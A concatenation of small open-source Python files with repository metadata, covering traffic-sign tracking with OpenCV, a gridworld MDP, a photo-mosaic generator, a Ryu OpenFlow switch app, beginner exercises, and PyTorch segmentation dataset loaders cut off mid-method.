        cv2.putText(original_image, text, (coordinate[0][0], coordinate[0][1] - 15), font, 1, (0, 0, 255), 2, cv2.LINE_4)
    return coordinate, original_image, sign_type, text
def remove_line(img):
    """Mask out straight segments found by the probabilistic Hough transform."""
    gray = img.copy()
    edges = cv2.Canny(gray, 50, 150, apertureSize=3)
    min_line_length = 5
    max_line_gap = 3
    segments = cv2.HoughLinesP(edges, 1, np.pi / 180, 15, min_line_length, max_line_gap)
    # Start from an all-pass mask and black out every detected segment.
    mask = np.ones(img.shape[:2], dtype="uint8") * 255
    if segments is not None:
        for segment in segments:
            for x1, y1, x2, y2 in segment:
                cv2.line(mask, (x1, y1), (x2, y2), (0, 0, 0), 2)
    return cv2.bitwise_and(img, img, mask=mask)
def remove_other_color(img):
    """Build a mask keeping only blue-ish, white-ish and black-ish pixels.

    The frame is blurred, converted to HSV, thresholded into three color
    bands, and the union of the bands is returned as a binary mask.
    """
    blurred = cv2.GaussianBlur(img, (3, 3), 0)
    hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
    # Blue band.
    mask_blue = cv2.inRange(hsv, np.array([100, 128, 0]), np.array([215, 255, 255]))
    # White band (high value).
    mask_white = cv2.inRange(hsv,
                             np.array([0, 0, 128], dtype=np.uint8),
                             np.array([255, 255, 255], dtype=np.uint8))
    # Black band (low value).
    mask_black = cv2.inRange(hsv,
                             np.array([0, 0, 0], dtype=np.uint8),
                             np.array([170, 150, 50], dtype=np.uint8))
    combined = cv2.bitwise_or(mask_blue, mask_white)
    return cv2.bitwise_or(combined, mask_black)
def main(args):
    """Detect and track traffic signs in the video given by args.file_name.

    Per frame: localize/classify the largest sign candidate; when a new sign
    type appears, seed a CamShift tracker from its HSV histogram; while no
    new sign is detected, keep tracking the previous one. Annotated frames
    go to 'output.avi'; detections are logged to 'Output.txt' as
    "frame sign_type left top right bottom" rows after a leading count.
    """
    #Clean previous image
    clean_images()
    #Training phase
    model = training()
    vidcap = cv2.VideoCapture(args.file_name)
    fps = vidcap.get(cv2.CAP_PROP_FPS)
    width = vidcap.get(3) # float
    height = vidcap.get(4) # float
    # Define the codec and create VideoWriter object
    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    out = cv2.VideoWriter('output.avi',fourcc, fps , (640,480))
    # initialize the termination criteria for cam shift, indicating
    # a maximum of ten iterations or movement by a least one pixel
    # along with the bounding box of the ROI
    termination = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
    roiBox = None
    roiHist = None
    success = True
    # NOTE(review): this local is unused — localization() receives the CLI
    # value args.similitary_contour_with_circle instead.
    similitary_contour_with_circle = 0.65 # parameter
    count = 0
    current_sign = None
    current_text = ""
    current_size = 0
    sign_count = 0
    coordinates = []
    position = []
    # NOTE(review): `file` shadows the Python 2 builtin of the same name.
    file = open("Output.txt", "w")
    while True:
        success,frame = vidcap.read()
        if not success:
            print("FINISHED")
            break
        width = frame.shape[1]
        height = frame.shape[0]
        #frame = cv2.resize(frame, (640,int(height/(width/640))))
        frame = cv2.resize(frame, (640,480))
        print("Frame:{}".format(count))
        #image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        coordinate, image, sign_type, text = localization(frame, args.min_size_components, args.similitary_contour_with_circle, model, count, current_sign)
        if coordinate is not None:
            cv2.rectangle(image, coordinate[0],coordinate[1], (255, 255, 255), 1)
        print("Sign:{}".format(sign_type))
        # A sign type different from the tracked one: (re)seed the tracker.
        if sign_type > 0 and (not current_sign or sign_type != current_sign):
            current_sign = sign_type
            current_text = text
            # Shrink the detection box slightly so the ROI stays inside the sign.
            top = int(coordinate[0][1]*1.05)
            left = int(coordinate[0][0]*1.05)
            bottom = int(coordinate[1][1]*0.95)
            right = int(coordinate[1][0]*0.95)
            position = [count, sign_type if sign_type <= 8 else 8, coordinate[0][0], coordinate[0][1], coordinate[1][0], coordinate[1][1]]
            cv2.rectangle(image, coordinate[0],coordinate[1], (0, 255, 0), 1)
            font = cv2.FONT_HERSHEY_PLAIN
            cv2.putText(image,text,(coordinate[0][0], coordinate[0][1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
            tl = [left, top]
            br = [right,bottom]
            print(tl, br)
            current_size = math.sqrt(math.pow((tl[0]-br[0]),2) + math.pow((tl[1]-br[1]),2))
            # grab the ROI for the bounding box and convert it
            # to the HSV color space
            roi = frame[tl[1]:br[1], tl[0]:br[0]]
            roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
            #roi = cv2.cvtColor(roi, cv2.COLOR_BGR2LAB)
            # compute a HSV histogram for the ROI and store the
            # bounding box
            roiHist = cv2.calcHist([roi], [0], None, [16], [0, 180])
            roiHist = cv2.normalize(roiHist, roiHist, 0, 255, cv2.NORM_MINMAX)
            roiBox = (tl[0], tl[1], br[0], br[1])
        elif current_sign:
            # No new detection: follow the previous sign with CamShift.
            hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
            backProj = cv2.calcBackProject([hsv], [0], roiHist, [0, 180], 1)
            # apply cam shift to the back projection, convert the
            # points to a bounding box, and then draw them
            (r, roiBox) = cv2.CamShift(backProj, roiBox, termination)
            pts = np.int0(cv2.boxPoints(r))
            s = pts.sum(axis = 1)
            tl = pts[np.argmin(s)]
            br = pts[np.argmax(s)]
            size = math.sqrt(pow((tl[0]-br[0]),2) +pow((tl[1]-br[1]),2))
            print(size)
            # Drop the track when the box collapses, explodes (>30x), or its
            # aspect ratio stops being roughly square.
            if current_size < 1 or size < 1 or size / current_size > 30 or math.fabs((tl[0]-br[0])/(tl[1]-br[1])) > 2 or math.fabs((tl[0]-br[0])/(tl[1]-br[1])) < 0.5:
                current_sign = None
                print("Stop tracking")
            else:
                current_size = size
            if sign_type > 0:
                # Same sign type re-detected: log the fresh detection box.
                top = int(coordinate[0][1])
                left = int(coordinate[0][0])
                bottom = int(coordinate[1][1])
                right = int(coordinate[1][0])
                position = [count, sign_type if sign_type <= 8 else 8, left, top, right, bottom]
                cv2.rectangle(image, coordinate[0],coordinate[1], (0, 255, 0), 1)
                font = cv2.FONT_HERSHEY_PLAIN
                cv2.putText(image,text,(coordinate[0][0], coordinate[0][1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
            elif current_sign:
                # Still tracking: log the CamShift box instead.
                position = [count, sign_type if sign_type <= 8 else 8, tl[0], tl[1], br[0], br[1]]
                cv2.rectangle(image, (tl[0], tl[1]),(br[0], br[1]), (0, 255, 0), 1)
                font = cv2.FONT_HERSHEY_PLAIN
                cv2.putText(image,current_text,(tl[0], tl[1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
        if current_sign:
            sign_count += 1
            coordinates.append(position)
        cv2.imshow('Result', image)
        count = count + 1
        #Write to video
        out.write(image)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    file.write("{}".format(sign_count))
    for pos in coordinates:
        file.write("\n{} {} {} {} {} {}".format(pos[0],pos[1],pos[2],pos[3],pos[4], pos[5]))
    print("Finish {} frames".format(count))
    file.close()
    return
if __name__ == '__main__':
    # Command-line interface: the input video plus the two detection knobs.
    cli = argparse.ArgumentParser(description="NLP Assignment Command Line")
    cli.add_argument('--file_name',
                     default="./Videos/MVI_1049.avi",
                     help="Video to be analyzed")
    cli.add_argument('--min_size_components',
                     type=int,
                     default=300,
                     help="Min size component to be reserved")
    cli.add_argument('--similitary_contour_with_circle',
                     type=float,
                     default=0.65,
                     help="Similitary to a circle")
    main(cli.parse_args())
| [
"noreply@github.com"
] | himol7.noreply@github.com |
ef8b694de6c2ac6d30f02461ff1ca3cdcf3cd010 | 837377dc4df28263a61ee4af32514b52f3beb976 | /scripts/inverse_reinforcement_learning/envs/gridworld.py | a35a714dc92bf33cb95d8012cb7d6d70b952727c | [] | no_license | aoyan27/reinforcement_learning | 2279a36c1ba0cec1f4e254af71ebb6e6431b5636 | 9170e9e720e0e1a541b586465e01bd89555d27f2 | refs/heads/master | 2021-09-08T01:21:53.630653 | 2018-03-05T03:19:59 | 2018-03-05T03:19:59 | 100,631,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,341 | py | #!/usr/bin.env python
#coding:utf-8
import numpy as np
class Gridworld:
    """Simple stochastic grid-world MDP (Python 2 code: xrange/print/int division).

    States are [y, x] cells on a rows x cols grid; the goal is the
    bottom-right cell and pays R_max. Actions are {0:'>', 1:'<', 2:'v',
    3:'^', 4:'-' (stay)}. With probability `noise`, spread uniformly over
    all actions, the executed action differs from the requested one.
    """
    def __init__(self, rows, cols, R_max, noise):
        self.rows = rows
        self.cols = cols
        self.n_state = self.rows * self.cols
        self.R_max = R_max
        self.noise = noise
        self.grid = np.zeros((self.rows, self.cols))
        # +----------------> x
        # |
        # |
        # |
        # |
        # |
        # |
        # V
        # y
        self.goal = (self.rows-1, self.cols-1)
        self.grid[self.goal] = self.R_max
        self.action_list = [0, 1, 2, 3, 4]
        self.n_action = len(self.action_list)
        self.dirs = {0: '>', 1: '<', 2: 'v', 3: '^', 4: '-'}
        # Current agent position [y, x]; set by reset()/step().
        self.state_ = None
        # Whether the last attempted move left the grid (and was clamped).
        self.out_of_range_ = None
    def state2index(self, state):
        """Flatten [y, x] into the scalar index y + cols*x."""
        # state[0] : y
        # state[1] : x
        # return state[1] + self.cols * state[0]
        return state[0] + self.cols * state[1]
    def index2state(self, index):
        """Inverse of state2index.

        NOTE(review): relies on Python 2 integer division; under Python 3
        `index / self.cols` would produce a float coordinate.
        """
        state = [0, 0]
        state[0] = index % self.cols
        state[1] = index / self.cols
        return state
    def get_next_state_and_probs(self, state, action):
        """Return ([next_state per action], probs) for taking `action` in `state`.

        The requested action gets probability 1-noise, and noise/n_action is
        added to every action. Moves that leave the grid (or any move from
        the goal) have their probability folded into the last action (stay).
        """
        transition_probability = 1 - self.noise
        probs = np.zeros([self.n_action])
        probs[int(action)] = transition_probability
        probs += self.noise / self.n_action
        # print "probs : "
        # print probs
        next_state_list = []
        for a in xrange(self.n_action):
            if state != list(self.goal):
                # print "state : ", state
                next_state, out_of_range = self.move(state, a)
                self.out_of_range_ = out_of_range
                # print "next_state() : "
                # print next_state
                next_state_list.append(next_state)
                if out_of_range:
                    # Clamped move: mass moves onto the "stay" action.
                    probs[self.n_action-1] += probs[a]
                    probs[a] = 0
            else:
                # Goal is absorbing: all probability collapses onto "stay".
                next_state = state
                # print "probs[", a, "] : ", probs[a]
                if a != self.n_action-1:
                    probs[self.n_action-1] += probs[a]
                    probs[a] = 0
                next_state_list.append(next_state)
        # print "next_state_ : "
        # print next_state
        # print "next_state_list : "
        # print next_state_list
        # print "probs_ : "
        # print probs
        return next_state_list, probs
    def get_transition_matrix(self):
        """Build the dense transition tensor P[s, s', a] for the whole MDP."""
        P = np.zeros((self.n_state, self.n_state, self.n_action), dtype=np.float32)
        for state_index in xrange(self.n_state):
            state = self.index2state(state_index)
            # print "state : ", state
            for action_index in xrange(self.n_action):
                action = self.action_list[action_index]
                # print "action : ", action
                next_state_list, probs = self.get_next_state_and_probs(state, action)
                # print "next_state_list : ", next_state_list
                # print "probs : ", probs
                for i in xrange(len(probs)):
                    next_state = next_state_list[i]
                    # print "next_state : ", next_state
                    next_state_index = self.state2index(next_state)
                    probability = probs[i]
                    # print "probability : ", probability
                    P[state_index, next_state_index, action_index] = probability
        # print "P : "
        # print P
        # print P.shape
        return P
    def move(self, state, action):
        """Apply `action` to [y, x]; return ([y, x], clamped_out_of_range)."""
        y, x = state
        if action == 0:
            # right
            x = x + 1
        elif action == 1:
            # left
            x = x - 1
        elif action == 2:
            # down
            y = y + 1
        elif action == 3:
            # up
            y = y - 1
        else:
            # stay
            x = x
            y = y
        out_of_range = False
        if x < 0:
            x = 0
            out_of_range = True
        elif x > (self.cols-1):
            x = self.cols - 1
            out_of_range = True
        if y < 0:
            y = 0
            out_of_range = True
        elif y > (self.rows-1):
            y = self.rows - 1
            out_of_range = True
        return [y, x], out_of_range
    def show_policy(self, policy, deterministic=True):
        """Print the policy as a grid of arrows ('G' marks the goal).

        `policy` is either one action index per state (deterministic) or a
        per-state action distribution (the argmax is displayed).
        """
        vis_policy = np.array([])
        if deterministic:
            for i in xrange(len(policy)):
                vis_policy = np.append(vis_policy, self.dirs[policy[i]])
                # print self.dirs[policy[i]]
        else:
            # for i in xrange(len(policy)):
            #     # print "np.sum(policy[s]) : ", np.sum(policy[i])
            #     random_num = np.random.rand()
            #     # print "random_num : ", random_num
            #     action_index = 0
            #     for j in xrange(len(policy[i])):
            #         random_num -= policy[i][j]
            #         # print "random_num_ : ", random_num
            #         if random_num < 0:
            #             action_index = j
            #             break
            #     vis_policy = np.append(vis_policy, self.dirs[action_index])
            #     # print self.dirs[action_index]
            for i in xrange(len(policy)):
                vis_policy = np.append(vis_policy, self.dirs[np.argmax(policy[i])])
        vis_policy = vis_policy.reshape((self.rows, self.cols)).transpose()
        vis_policy[self.goal] = 'G'
        print vis_policy
    def terminal(self, state):
        """True iff `state` is the goal cell."""
        episode_end = False
        if state == list(self.goal):
            episode_end = True
        return episode_end
    def reset(self, start_position=[0,0]):
        """Place the agent at start_position and return the state.

        NOTE(review): mutable default argument — the same list object is
        shared across calls that omit start_position.
        """
        self.state_ = start_position
        return self.state_
    def step(self, action, reward_map=None):
        """Sample one transition; return (state, reward, episode_end, info).

        The reward is R_max at the goal (or 0) unless a flat reward_map
        indexed by state2index is supplied.
        """
        next_state_list, probs = self.get_next_state_and_probs(self.state_, action)
        # print "next_state_list : ", next_state_list
        # print "probs : ", probs
        random_num = np.random.rand()
        # print "random_num : ", random_num
        index = 0
        # Inverse-CDF sampling over the action outcome probabilities.
        for i in xrange(len(probs)):
            random_num -= probs[i]
            # print "random_num_ : ", random_num
            if random_num < 0:
                index = i
                break
        # print "index : ", index
        # print "next_state : ", next_state_list[index]
        self.state_ = next_state_list[index]
        # self.state_, _ = self.move(self.state_, action)
        reward = None
        if reward_map is None:
            if self.state_ == list(self.goal):
                reward = self.R_max
            else:
                reward = 0
        else:
            reward = reward_map[self.state2index(self.state_)]
        # print "reward : ", reward
        episode_end = self.terminal(self.state_)
        return self.state_, reward, episode_end, {'probs':probs, 'random_num':random_num}
if __name__=="__main__":
    # Smoke test: run a uniformly random agent for up to 1000 episodes of
    # 200 steps each on a 5x5 grid (Python 2 print statements).
    rows = 5
    cols = 5
    R_max = 10.0
    noise = 0.3
    env = Gridworld(rows, cols, R_max, noise)
    print "env.n_state : ", env.n_state
    print "env.n_action : ", env.n_action
    max_episode = 1000
    max_step = 200
    # reward_map = np.load('./reward_map.npy')
    # print "reward_map : "
    # print reward_map
    # Hand-built reward map: R_max at the goal cell, zero elsewhere.
    reward_map = np.zeros([rows, cols])
    reward_map[rows-1, cols-1] = R_max
    for i in xrange(max_episode):
        print "================================================="
        print "episode : ", i+1
        observation = env.reset()
        for j in xrange(max_step):
            print "---------------------------------------------"
            state = observation
            print "state : ", state
            # Uniform random action.
            action = np.random.randint(env.n_action)
            print "action : ", action, env.dirs[action]
            # observation, reward, done, info = env.step(action)
            observation, reward, done, info = env.step(action, reward_map)
            next_state = observation
            print "next_state : ", next_state
            print "reward : ", reward
            print "episode_end : ", done
            # print "info : ", info
            print "step : ", j+1
            if done:
                break
| [
"ce62001@meiji.ac.jp"
] | ce62001@meiji.ac.jp |
dce3ca6bb9e7f047acd4519df5a741b2d272fc7a | 4cee60f2f2a271de1f3a9f7c4b8e8bad42aa6a60 | /mosaic.py | c38c372f319efb8df4a77dea873ad439fdcd468b | [
"Apache-2.0"
] | permissive | bartoszptak/Mosaic_maker | 86f6706f2b520114229b5aaf98feb997019db902 | 50166305eb2ffea075c67b28a97900dead74a466 | refs/heads/master | 2021-10-29T14:46:29.398427 | 2019-10-18T08:11:49 | 2019-10-18T08:11:49 | 208,629,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | import cv2
import numpy as np
import numpy.ma as ma
import time
# Number of quantization levels per channel used by make_mosaic (passed to
# quantize_colors before tiling).
COLORS = 32
def get_mosaic_list():
    """Return the sorted, title-cased names of all tile images in data/tiles.

    Returns:
        list[str]: e.g. ['Blue_Sky', 'Red'] for blue_sky.png and red.png.
    """
    from glob import glob
    import os
    # FIX: the original split on a hard-coded '/', which breaks on Windows
    # where glob returns backslash-separated paths; os.path handles both,
    # and splitext keeps dotted stems intact.
    names = []
    for path in glob('data/tiles/*.png'):
        stem = os.path.splitext(os.path.basename(path))[0]
        names.append(stem.title())
    return sorted(names)
def read_all(file, tile):
    """Load the source image and the named tile image from data/tiles."""
    source_image = cv2.imread(file)
    tile_image = cv2.imread(f'data/tiles/{tile}.png')
    return source_image, tile_image
def resize_all(img, tile, size):
    """Shrink the source image by a factor of size/2 and scale the tile to
    size x size, returning the tile as float."""
    shrunk = cv2.resize(img, (0, 0), fx=1/(size/2), fy=1/(size/2))
    scaled_tile = cv2.resize(tile, (size, size)).astype('float')
    return shrunk, scaled_tile
def quantize_colors(img, colors):
    """Snap every channel value to one of `colors` evenly spaced levels in [0, 255]."""
    as_float = img.astype('float')
    levels = np.round(as_float / 255 * colors)
    return levels / colors * 255
def make_move_color(result, tile, scale, yx, bgr):
    """Paste one tile, tinted by the pixel color `bgr`, into `result` in place.

    Args:
        result: output float image, modified in place.
        tile: float tile of shape (scale, scale, 3); not modified.
        scale: tile edge length in pixels.
        yx: (row, col) position of the tile in tile units (multiplied by scale).
        bgr: per-channel offset added to the tile (the source pixel's color).
    """
    # Copy + tint in one step, then saturate at 255. The original did this
    # via a masked-array round-trip (ma.masked_where(...).mask), which also
    # relied on subtle bool-scalar indexing when nothing exceeded 255;
    # np.clip is the direct idiom and behaves identically.
    patch = tile + bgr
    np.clip(patch, None, 255, out=patch)
    row, col = yx[0] * scale, yx[1] * scale
    result[row:row + scale, col:col + scale] = patch
def get_mosaic(img, tile, size, shape):
    """Render one tinted tile per source pixel, then resize to `shape` (h, w)."""
    rows, cols = img.shape[0], img.shape[1]
    # White float canvas, one (size x size) cell per source pixel.
    canvas = np.full((rows * size, cols * size, 3), 255, dtype=np.float32)
    for y in range(rows):
        for x in range(cols):
            make_move_color(canvas, tile, size, (y, x), img[y, x])
    return cv2.resize(canvas.astype('uint8'), (shape[1], shape[0]))
def make_mosaic(img_file, tile_file, size):
    """Full pipeline: load, quantize, tile, and overwrite img_file with the mosaic."""
    image, tile = read_all(img_file, tile_file)
    original_shape = image.shape
    image, tile = resize_all(image, tile, size)
    reduced = quantize_colors(image, COLORS)
    mosaic = get_mosaic(reduced, tile, size, original_shape)
    cv2.imwrite(img_file, mosaic)
| [
"bartptak@gmail.com"
] | bartptak@gmail.com |
8f2212df179883468530dd1fd6f1c1df00460046 | 1ca5db01f7214346cc06315c142df81d2bfcdec0 | /add_flow.py | 1338eb818c03ffc9084677019d2abd51b6ca3e0a | [] | no_license | XoulKool/AddFlow | f8bb39edb52d7d0bfa117faff1bcf9a5916b4eaf | 3e0de07da3dddca07c806e8bb33c7d64c88abf4a | refs/heads/master | 2020-04-18T04:09:42.772656 | 2017-08-28T20:50:54 | 2017-08-28T20:50:54 | 66,281,422 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,216 | py | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An OpenFlow 1.0 L2 learning switch implementation.
"""
import time
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
# One-shot guard: the two static flows are installed only on the first
# PacketIn (see SimpleSwitch._packet_in_handler below).
k = 0
# Timestamp logs (microseconds since epoch) for the two flow installs;
# opened in append mode and left to close at interpreter shutdown.
f1 = open('sslog1.txt', 'a')
f2 = open('sslog2.txt', 'a')
class SimpleSwitch(app_manager.RyuApp):
    """Minimal OpenFlow 1.0 app: on the first PacketIn it wires port 1 <-> 2
    with two static flows and logs the install timestamps to f1/f2."""
    OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION]
    def __init__(self, *args, **kwargs):
        super(SimpleSwitch, self).__init__(*args, **kwargs)
        self.mac_to_port = {}
    def add_flow(self, datapath, in_port, actions):
        """Install a flow matching `in_port` that applies `actions`."""
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        match = parser.OFPMatch(in_port=in_port)
        flow = parser.OFPFlowMod(
            datapath=datapath, match=match, cookie=0,
            command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
            priority=ofproto.OFP_DEFAULT_PRIORITY,
            flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
        datapath.send_msg(flow)
    def remove_table_flows(self, datapath, table_id, match, actions):
        """Create OFP flow mod message to remove flows from table."""
        ofproto = datapath.ofproto
        return datapath.ofproto_parser.OFPFlowMod(
            datapath, match=match, cookie=0, command=ofproto.OFPFC_DELETE,
            idle_timeout=0, hard_timeout=0,
            priority=ofproto.OFP_DEFAULT_PRIORITY,
            flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def _packet_in_handler(self, ev):
        """Log every PacketIn; install the two static flows exactly once."""
        global k
        msg = ev.msg
        datapath = msg.datapath
        pkt = packet.Packet(msg.data)
        eth = pkt.get_protocol(ethernet.ethernet)
        if eth.ethertype == ether_types.ETH_TYPE_LLDP:
            # ignore lldp packet
            return
        dpid = datapath.id
        self.mac_to_port.setdefault(dpid, {})
        self.logger.info("packet in %s %s %s %s", dpid, eth.src, eth.dst, msg.in_port)
        if k == 0:
            # First packet only: forward port 2 -> 1 and port 1 -> 2, and
            # record each install time in microseconds.
            self.add_flow(datapath, 2, [datapath.ofproto_parser.OFPActionOutput(1)])
            f1.write(str(int(time.time() * 1000000)))
            f1.write('\n')
            self.add_flow(datapath, 1, [datapath.ofproto_parser.OFPActionOutput(2)])
            f2.write(str(int(time.time() * 1000000)))
            f2.write('\n')
            k = 1
    @set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
    def _port_status_handler(self, ev):
        """Log switch port add/delete/modify notifications."""
        msg = ev.msg
        reason = msg.reason
        port_no = msg.desc.port_no
        ofproto = msg.datapath.ofproto
        if reason == ofproto.OFPPR_ADD:
            self.logger.info("port added %s", port_no)
        elif reason == ofproto.OFPPR_DELETE:
            self.logger.info("port deleted %s", port_no)
        elif reason == ofproto.OFPPR_MODIFY:
            self.logger.info("port modified %s", port_no)
        else:
            self.logger.info("Illeagal port state %s %s", port_no, reason)
| [
"noreply@github.com"
] | XoulKool.noreply@github.com |
906738f6220d65cce1625250b86529ae2a068ae8 | 1d22f82abc38dd85a844cb6a19ec83ffae2a434d | /data_sci_long/solution_dsci_chapter_01_python_review.py | d23f3b9cce6e42e7caa04228aff1a0e49ce801d1 | [] | no_license | pbarton666/learninglab | c4d5602d148618ee2848a4954d8d93eae24be9ef | f2ad15b77aefcf65bd19e00f3f61687b4f13b737 | refs/heads/master | 2022-12-14T05:55:33.346925 | 2021-07-13T17:21:42 | 2021-07-13T17:21:42 | 84,211,135 | 2 | 3 | null | 2022-12-08T06:51:28 | 2017-03-07T14:52:08 | Jupyter Notebook | UTF-8 | Python | false | false | 416 | py | solution_dsci_chapter_01_python_review.py
class Dog():
    """A single dog, identified only by its name."""
    def __init__(self, name):
        """Remember the dog's name on the instance."""
        self.name = name
class Pack(Dog):
    """A collection of dog names, grown via the overloaded + operator.

    NOTE(review): inherits Dog but never calls Dog.__init__, so a Pack
    carries no name of its own.
    """
    def __init__(self):
        self.members = []
    def __add__(self, new):
        """Record the name of `new` (any object with a .name attribute).

        Returns None, so `pack + dog` cannot be chained.
        """
        self.members.append(new.name)
# Assemble a pack of three dogs using the overloaded "+" operator,
# then report the pack size and the comma-separated member names.
pack = Pack()
for dog_name in ('lassie', 'spicey', 'kelly'):
    pack + Dog(dog_name)
print("Yay! There are now {} dog(s):\n{}\n"
      .format(len(pack.members), ', '.join(pack.members)))
x=1 | [
"pbarton@SEB01.COM"
] | pbarton@SEB01.COM |
c6f571894dd7ccf9741d5e68fab1fbc91010d2d7 | 870bb117e3382fc3db8fdf146a96b495da04e1df | /week-03/day-2/38.py | 7719dc748471dcfe008f187b390081623059622c | [] | no_license | approximata/greenfox-weeks | f92b7900437325abbb609ac43e4fe0f8e68a5c36 | a10648d80869fcc151ea7246366f4c4a9e19a768 | refs/heads/master | 2021-01-24T18:59:19.253880 | 2016-08-21T15:17:33 | 2016-08-21T15:17:33 | 86,173,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | numbers = [7, 5, 8, -1, 2]
# Write a function that returns the minimal element
# in a list (your own min function)
def mymin(nu):
    """Return the smallest element of the non-empty list `nu`.

    A hand-rolled equivalent of the builtin min(), kept manual on purpose
    (this is the exercise). Raises IndexError on an empty list, matching
    the original's behavior of indexing nu[0] first.
    """
    # FIX: the original used an inverted `if ...: pass / else:` branch;
    # iterate the values directly and update on a straight comparison.
    smallest = nu[0]
    for value in nu:
        if value < smallest:
            smallest = value
    return smallest
# Exercise check: prints -1 for the sample list defined above.
print(mymin(numbers))
| [
"bodormate@gmail.com"
] | bodormate@gmail.com |
fa1bfe93bc5ca8cf885d0b3793c93d010857eca7 | 2f49c92451e81204ed65648f92bb363d0f957658 | /Code/tools/my_dataset.py | 659a45121de63b72b8c1edcff6f02eed2a8396f0 | [] | no_license | luweishuang/Sky-Replacement | 74b40997f50cb5b0153111f5389d813032bdedd9 | e77bec6de444f09e47c6321bea3f2e257dbd1c13 | refs/heads/master | 2023-05-31T02:05:36.028540 | 2021-05-31T09:27:17 | 2021-05-31T09:27:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,642 | py | # -*- coding: utf-8 -*-
import os
import random
import numpy as np
import torch
from PIL import Image
from torch.utils.data import Dataset
from glob import glob
from matplotlib import pyplot as plt
# Fix the shuffle order used by the dataset classes below for reproducibility.
random.seed(1)
# Class-folder name -> label index for the RMB denomination task.
rmb_label = {"1": 0, "100": 1}
class RMBDataset(Dataset):
    """RMB (renminbi) denomination classification dataset.

    Expects data_dir/<class_folder>/*.jpg, where the folder name ("1" or
    "100") maps to a label through the module-level rmb_label dict.
    """
    def __init__(self, data_dir, transform=None):
        """
        :param data_dir: str, root directory of the dataset
        :param transform: torch transform applied to every image
        """
        self.label_name = {"1": 0, "100": 1}
        # Every (image path, label) pair; DataLoader indexes into this.
        self.data_info = self.get_img_info(data_dir)
        self.transform = transform
    def __getitem__(self, index):
        path_img, label = self.data_info[index]
        image = Image.open(path_img).convert('RGB')  # channel values 0..255
        if self.transform is not None:
            image = self.transform(image)  # e.g. ToTensor / normalization
        return image, label
    def __len__(self):
        return len(self.data_info)
    @staticmethod
    def get_img_info(data_dir):
        """Walk data_dir and collect (image_path, label) for every .jpg file."""
        samples = []
        for root, dirs, _ in os.walk(data_dir):
            for class_dir in dirs:  # one sub-folder per class
                for file_name in os.listdir(os.path.join(root, class_dir)):
                    if not file_name.endswith('.jpg'):
                        continue
                    path_img = os.path.join(root, class_dir, file_name)
                    samples.append((path_img, int(rmb_label[class_dir])))
        return samples
class PortraitDataset(Dataset):
    """Portrait matting dataset: each *_matte.png mask is paired with the
    image that shares its stem (mask path minus '_matte.png', plus '.png')."""
    def __init__(self, data_dir, transform=None, in_size=224):
        super(PortraitDataset, self).__init__()
        self.data_dir = data_dir
        self.transform = transform
        self.label_path_list = list()
        self.in_size = in_size
        # Gather the mask paths up front; image paths are derived per item.
        self._get_img_path()
    def __getitem__(self, index):
        mask_path = self.label_path_list[index]
        image_path = mask_path[:-10] + ".png"  # strip the "_matte.png" suffix
        image = Image.open(image_path).convert('RGB')
        image = image.resize((self.in_size, self.in_size), Image.BILINEAR)
        mask = Image.open(mask_path).convert('L')
        # NEAREST keeps mask values crisp (no interpolated labels).
        mask = mask.resize((self.in_size, self.in_size), Image.NEAREST)
        if self.transform is not None:
            image = self.transform(image)
            mask = self.transform(mask)
        # NOTE(review): pops up a window for every fetched sample, which
        # blocks DataLoader workers — presumably leftover debugging.
        plt.subplot(121).imshow(image)
        plt.subplot(122).imshow(mask)
        plt.show()
        image_chw = np.array(image).transpose((2, 0, 1))  # HWC -> CHW
        mask_hw = np.array(mask)
        mask_hw[mask_hw != 0] = 1  # binarize the matte to {0, 1}
        mask_chw = mask_hw[np.newaxis, :, :]
        return torch.from_numpy(image_chw).float(), torch.from_numpy(mask_chw).float()
    def __len__(self):
        return len(self.label_path_list)
    def _get_img_path(self):
        """Collect and shuffle every *_matte.png mask path under data_dir."""
        names = [n for n in os.listdir(self.data_dir) if n.endswith("_matte.png")]
        paths = [os.path.join(self.data_dir, n) for n in names]
        random.shuffle(paths)
        if not paths:
            raise Exception("\ndata_dir:{} is a empty dir! Please checkout your path to images!".format(self.data_dir))
        self.label_path_list = paths
class SkyDataset(Dataset):
    """Sky segmentation dataset: images under <root>/image, masks under <root>/mask."""
    def __init__(self, data_dir, transform=None, in_size=224):
        super(SkyDataset, self).__init__()
        self.data_dir = data_dir
        self.transform = transform
        self.label_path_list = list()
        self.in_size = in_size
        # Collect image and mask paths and sanity-check that they line up.
        self._get_img_path()
    def __getitem__(self, index):
        path_label = self.label_path_list[index]
